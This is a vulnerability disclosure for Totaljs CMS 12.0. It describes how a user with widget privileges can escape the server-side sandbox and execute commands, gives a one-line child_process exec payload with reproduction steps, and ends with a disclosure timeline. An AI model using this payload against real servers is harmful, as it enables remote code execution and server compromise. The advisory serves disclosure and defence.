Share
[+] Author/Discoverer: Riccardo Krauter @CertimeterGroup  
  
[+] Title: Totaljs CMS Authenticated Code injection on widget creation.  
  
[+] Affected software: Totaljs CMS 12.0  
  
[+] Description:  
  
An authenticated user with “widgets” privilege can gain RCE on the   
remote server by creating a malicious widget with a special tag   
containing java-script code that will be evaluated server side.  
In the process of evaluating the tag by back-end is possible to escape   
the sandbox object by using the following payload:  
<script   
total>global.process.mainModule.require(‘child_process’).exec(‘RCE   
here’);</script>  
  
[+] Step to reproduce:  
  
1) browse to http://localhost:8000/admin/widgets/  
2) click on create  
3) paste the payload in the source code filed  
4) click on save  
  
[+] Project link: https://github.com/totaljs/cms  
  
[+] Original report and details:   
https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf  
  
[+] Timeline:  
  
- 13/02/2019 -> reported the issue to the vendor  
  
.... many ping here  
  
- 18/06/2019 -> pinged the vendor last time  
  
- 30/08/2019 -> reported to seclist